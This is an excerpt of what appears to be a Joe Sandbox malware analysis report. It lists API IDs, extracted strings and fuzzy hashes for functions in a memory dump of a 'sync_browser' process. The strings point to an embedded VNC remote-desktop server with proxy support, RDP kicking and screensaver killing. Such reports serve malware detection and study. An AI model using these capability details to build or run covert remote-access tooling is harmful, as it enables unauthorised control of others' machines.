• Opcode Fuzzy Hash: e970080873c8215d67751cf4df8fe2b5e593792b79e840585fb32c8e919cf0fc
• Instruction Fuzzy Hash: 68E1AF32A086C585E760AB39C4687FEB7A1FB85F94F854036EA4C877A9CF38D441C721
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Enter$Leave
• String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
• API String ID: 2801635615-1537001432
• Opcode ID: 0815a291423a4761241bbe2c4cff846dfa2ae7941a28891a62adbef60b9886ff
• Instruction ID: 4e5db0700944667c31b96c9ef9f736e32465d5f31e65167ab444f0475ae47b45
• Opcode Fuzzy Hash: 0815a291423a4761241bbe2c4cff846dfa2ae7941a28891a62adbef60b9886ff
• Instruction Fuzzy Hash: 4FD1C422A086C585F750AB39C4687FEA7A0FBC5F94F854136EA4C877A9CF38D445C722
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
                                                                      • String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
                                                                      • API String ID: 1719662965-904825817
                                                                      • Opcode ID: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                      • Instruction ID: cf40c82babf57ecda78fa6bc247ec75811cc2b4699aea66d63faf961f96f98af
                                                                      • Opcode Fuzzy Hash: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                      • Instruction Fuzzy Hash: 51416275A08A8A81F620BB25B8253B9A390FF49F90F844137DD5DC7799DE3CE105C722
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                                      • String ID:
                                                                      • API String ID: 4219907860-0
                                                                      • Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                      • Instruction ID: e226ce8c923ca4fe3b55afd6741a0a4b8193649f73e10a5117270fcc0607e85d
                                                                      • Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                      • Instruction Fuzzy Hash: 5941653661868686E730AF25B8547AAB350FB88FD8F405536EE4E87B58EF7CD104C721
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$FileModuleNameStringVersion
                                                                      • String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
                                                                      • API String ID: 769895750-1251308945
                                                                      • Opcode ID: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                      • Instruction ID: dcfe63d541996ed8849c4cc0a911d428d23c23ca88d102e3e19d2484c34059ca
                                                                      • Opcode Fuzzy Hash: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                      • Instruction Fuzzy Hash: 3851B12560868A95E720AB34B4613A9B7A0FB44BB0F844337EA7D836D9DF3CD405C722
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Free$AddressLoadProc
                                                                      • String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
                                                                      • API String ID: 1386263645-671781545
                                                                      • Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                      • Instruction ID: b37c97d9e61c3ccc9ef931f4fb3042b7c8ef67e7db60fdc8d4ea4743c0c5c4f4
                                                                      • Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                      • Instruction Fuzzy Hash: 6B418F3190C60A85FB24BF34E475338A291EB45F69F904932E51D862D9EF7DE4448733
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
                                                                      • API String ID: 3057866299-2798169553
                                                                      • Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                      • Instruction ID: b0dc55c18b00ea0e0e33d37a821784f7c223563d2096b9f5c45102df980cfb80
                                                                      • Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                      • Instruction Fuzzy Hash: E6319720A1964A91FD65BB29E4613B4D390EF54F44FC80437EA0DC62A5FF3CE894C362
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close$CreateOpenQueryValueVersion
                                                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                      • API String ID: 1076069355-3579764778
                                                                      • Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                      • Instruction ID: e8c689a6fe36b7fa92b5e518ce4f40f2459e8b0111c426571a71becd4f5315f7
                                                                      • Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                      • Instruction Fuzzy Hash: FD317576908B8686EB609B10F4657AAF3A0FBC8B54FC01136E68D86A58DF3CD105CF11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
                                                                      • String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
                                                                      • API String ID: 1547096108-1130181218
                                                                      • Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                      • Instruction ID: aa33f64aaabef21b6a5a79f4853316e285069827ffe23aecb861492ef01f6bd4
                                                                      • Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                      • Instruction Fuzzy Hash: FF313725A1864A81F770BB25F871BBAA350FF84F44FC45137D90E82699DE3CE109C722
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$CountCriticalInitializeSectionTick
                                                                      • String ID: 0$GetSystemTimes$NtQuerySystemInformation$kernel32.dll$ntdll.dll
                                                                      • API String ID: 649669561-4005017345
                                                                      • Opcode ID: 074b37e70411e8fa4c2f927709ee4b204295ab1398dd26aff7224720a389b37b
                                                                      • Instruction ID: 0073b30c3f40f907081a42692dc2356e3f1b6d5814f11fd4b7f12cf778ed9d77
                                                                      • Opcode Fuzzy Hash: 074b37e70411e8fa4c2f927709ee4b204295ab1398dd26aff7224720a389b37b
                                                                      • Instruction Fuzzy Hash: 83212A35A05B0A82EB14AF24F860369B3E0FF48F94F845136DA5D86398EF3CE454C761
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalEventSection$EnterLeaveObjectResetSingleWait
                                                                      • String ID: c
                                                                      • API String ID: 295735435-112844655
                                                                      • Opcode ID: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                                      • Instruction ID: bfc84554b5904840a6eec4b62de44ff4d175a5d7159de17c07bd58ed87b24bc1
                                                                      • Opcode Fuzzy Hash: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                                      • Instruction Fuzzy Hash: 5821CF25618B4583DB20AB61F4641AAA370FB88F91F841032DB9E87669DF3CE445C761
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$CountEnterLeaveTick
                                                                      • String ID:
                                                                      • API String ID: 1056156058-0
                                                                      • Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                      • Instruction ID: e95e40a042f01fc85dc62d32cdfd057f87e9e9383bd2a3c1c48ca4fd8c47df32
                                                                      • Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                      • Instruction Fuzzy Hash: 87D11936A09B4A95DB10EF69F4503A9B3E4FB44B88F845036EA4C83B58DF3CE415C761
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Combine$DataDeleteObjectRegion$free
                                                                      • String ID:
                                                                      • API String ID: 1378972593-0
                                                                      • Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                      • Instruction ID: daba4e8aa3c4e888048a3bd870a36b1bd1085e4b947949a63f3f35a840ccab1e
                                                                      • Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                      • Instruction Fuzzy Hash: A4719FB6604A8586EB50DF2AE460AA9F7A0FB48FD4B849032EF4D87754DF3DD581CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
                                                                      • String ID:
                                                                      • API String ID: 707770685-0
                                                                      • Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                      • Instruction ID: fecbe8b0379f7c43ec33be63dd4bb29ee3add9f60c26e403389dc7f503b7ac14
                                                                      • Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                      • Instruction Fuzzy Hash: 2A419222608B8586D750AF29E4A43A9B360FBC5FE0F841232EA5E877A9DF3CD444C711
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Combine$DeleteObjectfree$CreateRect
                                                                      • String ID:
                                                                      • API String ID: 3143477926-0
